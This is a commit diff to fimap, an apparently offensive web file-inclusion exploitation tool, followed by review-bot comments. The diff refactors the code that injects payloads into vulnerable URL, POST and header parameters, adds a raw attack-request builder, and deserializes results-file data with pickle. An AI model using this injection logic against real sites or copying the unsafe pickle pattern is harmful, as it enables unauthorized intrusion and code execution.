Commit 3d2fb9b6 authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Some additions to the plugin engine.

parent cd67b770
......@@ -26,6 +26,7 @@ import sys
from baseClass import baseClass
from config import settings
import urllib2
import urlparse
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$03.09.2009 03:40:49$"
......@@ -47,10 +48,55 @@ class codeinjector(baseClass):
def setReport(self, report):
self.report = report
def start(self):
domain = self.chooseDomains()
vuln = self.chooseVuln(domain.getAttribute("hostname"))
def getPreparedComponents(self, shcode=None):
fpath = None
postdata = None
header_dict = []
vuln = self.vulnerability;
fpath = vuln.getAttribute("path")
param = vuln.getAttribute("param")
prefix = vuln.getAttribute("prefix")
suffix = vuln.getAttribute("suffix")
if (shcode == None):
shcode = vuln.getAttribute("file")
paramvalue = vuln.getAttribute("paramvalue")
postdata = vuln.getAttribute("postdata")
ispost = int(vuln.getAttribute("ispost"))
isUnix = vuln.getAttribute("os") == "unix"
vulnheaderkey = vuln.getAttribute("header_vuln_key")
header_dict_b64 = vuln.getAttribute("header_dict")
header_dict = {}
if (header_dict_b64 != ""):
header_dict_pickle = b64decode(header_dict_b64)
header_dict = pickle.loads(header_dict_pickle)
if (not isUnix and shcode[1]==":"):
shcode = shcode[3:]
payload = "%s%s%s" %(prefix, shcode, suffix)
if (ispost == 0):
fpath = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 1):
postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 2):
tmp = header_dict[vulnheaderkey]
tmp = tmp.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
header_dict[vulnheaderkey] = tmp
return(fpath, postdata, header_dict, payload)
def start(self, OnlyExploitable):
domain = self.chooseDomains(OnlyExploitable)
vuln = self.chooseVuln(domain.getAttribute("hostname"))
self.vulnerability = vuln;
hostname = domain.getAttribute("hostname")
mode = vuln.getAttribute("mode")
fpath = vuln.getAttribute("path")
......@@ -84,15 +130,7 @@ class codeinjector(baseClass):
plugman = self.config["PLUGINMANAGER"]
if (kernel == ""): kernel = None
payload = "%s%s%s" %(prefix, shcode, suffix)
if (ispost == 0):
fpath = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 1):
postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 2):
tmp = header_dict[vulnheaderkey]
tmp = tmp.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
header_dict[vulnheaderkey] = tmp
fpath, postdata, header_dict, payload = self.getPreparedComponents()
php_inject_works = False
sys_inject_works = False
working_shell = None
......@@ -867,4 +905,46 @@ class HaxHelper:
else:
break
f.close()
return(ret)
\ No newline at end of file
return(ret)
def getURL(self):
return self.url
def getHaxDataForCustomFile(self, file):
return(self.parent_codeinjector.getPreparedComponents(file))
def doRequest(self, URL, POST=None, HEADERS=None):
return(self.parent_codeinjector.doPostRequest(URL, POST, additionalHeaders=HEADERS))
def getRawHTTPRequest(self, customFile):
path, post, header, payload = self.parent_codeinjector.getPreparedComponents(customFile)
hasPost = post != None and post != ""
host = urlparse.urlsplit(self.url)[1]
ret = ""
if (not hasPost):
ret = "GET %s HTTP/1.1\r\n" %(path)
else:
ret = "POST %s HTTP/1.1\r\n" %(path)
ret += "Host: %s\r\n" %(host)
if header.has_key("Cookie"):
ret += "Cookie: "
for k,v in header["Cookie"]:
ret += "%s: %s;" %(k,v)
ret += "\r\n"
if (hasPost):
ret += "Content-Type: application/x-www-form-urlencoded\r\n"
ret += "Content-Length: %d\r\n"%(len(post))
ret += "\r\n"
ret += "%s\r\n" %(post)
ret += "\r\n"
return(ret)
def drawBox(self, header, choises):
self.parent_codeinjector.drawBox(header, choises)
\ No newline at end of file
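Review bot: In getRawHTTPRequest the Cookie serialization at `ret += "%s: %s;" %(k,v)` emits `name: value;` pairs, but a Cookie header carries `name=value` pairs separated by `; `, so the rendered request is not what a server would parse; `ret += "%s=%s; " %(k,v)` matches the header syntax. Only the "Cookie" entry of `header` is written at all — every other key, including the one named by `header_vuln_key` that getPreparedComponents rewrites, is silently dropped, so for the `ispost == 2` case the returned request omits the rewritten header unless that key happens to be Cookie; iterating `header.items()` and emitting each entry as `Name: value\r\n` would cover them. The pair unpacking `for k,v in header["Cookie"]` also presumes a sequence of pairs, whereas getPreparedComponents treats the vulnerable entry as a plain string (`tmp.replace(...)`), so the expected shape of header_dict values should be stated in a docstring on getPreparedComponents. Separately, `pickle.loads` in getPreparedComponents deserializes the base64 blob stored under the `header_dict` attribute of the results file, so anyone who can write that file gets code execution when exploit mode starts; a plain encoding such as JSON for that attribute would remove that exposure.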
......@@ -117,6 +117,8 @@ def show_help(AndQuit=False):
print "## Attack Kit:"
print " -x , --exploit Starts an interactive session where you can"
print " select a target and do some action."
print " -X Same as -x but also shows not exploitable which might can be"
print " hax0red with plugins."
print " -T , --tab-complete Enables TAB-Completation in exploit mode. Needs readline module."
print " Use this if you want to be able to tab-complete thru remote"
print " files\dirs. Eats an extra request for every 'cd' command."
......@@ -203,13 +205,13 @@ def show_ip():
print result.strip()
sys.exit(0)
def list_results(lst = os.path.join(os.path.expanduser("~"), "fimap_result.xml")):
def list_results(lst = os.path.join(os.path.expanduser("~"), "fimap_result.xml"), onlyExploitable=True):
if (not os.path.exists(lst)):
print "File not found! ~/fimap_result.xml"
sys.exit(1)
c = codeinjector(config)
c.start()
c.start(onlyExploitable)
sys.exit(0)
......@@ -290,9 +292,10 @@ if __name__ == "__main__":
"googlesleep=" , "dot-truncation", "dot-trunc-min=", "dot-trunc-max=", "dot-trunc-step=", "dot-trunc-ratio=",
"tab-complete" , "cookie=" , "bmin=" , "bmax=" , "dot-trunc-also-unix", "multiply-term=",
"autoawesome" , "force-run" , "force-os=" , "rfi-encoder=", "header=", "bing"]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CIDTM:4R:B", longSwitches)
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxXHw:d:bP:CIDTM:4R:B", longSwitches)
startExploiter = False
showOnlyExploitable = True
for k,v in optlist:
if (k in ("-u", "--url")):
......@@ -351,6 +354,9 @@ if __name__ == "__main__":
doInternetInfo = True
if (k in("-x", "--exploit")):
startExploiter = True
if (k in("-X",)):
startExploiter = True
showOnlyExploitable = False
if (k in ("-P", "--post")):
config["p_post"] = v
if (k in ("--no-auto-detect", )):
......@@ -444,7 +450,7 @@ if __name__ == "__main__":
if startExploiter:
try:
list_results()
list_results(onlyExploitable=showOnlyExploitable)
except KeyboardInterrupt:
print "\n\nYou killed me brutally. Wtf!\n\n"
sys.exit(0)
......@@ -464,9 +470,9 @@ if __name__ == "__main__":
# Get generic.xml from SVN repository and parse out its version.
generic_xml_online = tester.doGetRequest(defupdateurl + "generic.xml")
if generic_xml_online == None:
if generic_xml_online == None:
print "Failed to check generic_xml. Are you online?"
sys.exit(1)
sys.exit(1)
tmpFile = tempfile.mkstemp()[1] + ".xml"
f = open(tmpFile, "w")
......@@ -514,9 +520,9 @@ if __name__ == "__main__":
tester = codeinjector(config)
result = tester.doGetRequest(pluginlist)
if result == None:
print "Failed to request plugins! Are you online?"
sys.exit(1)
if result == None:
print "Failed to request plugins! Are you online?"
sys.exit(1)
choice = {}
idx = 1
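Review bot: The new `-X` branch at `if (k in("-X",)):` tests membership in a one-element tuple where a plain comparison says the same thing; `if k == "-X":` is the clearer form and matches how the option has no long alias in longSwitches. The keyword introduced here is `onlyExploitable` while codeinjector.start in the other file names its parameter `OnlyExploitable`; using one spelling across both signatures avoids confusion at the call site `c.start(onlyExploitable)`. A one-line docstring on list_results stating that `onlyExploitable=False` also lists results the scanner did not mark as exploitable would document the flag where it is consumed rather than only in show_help.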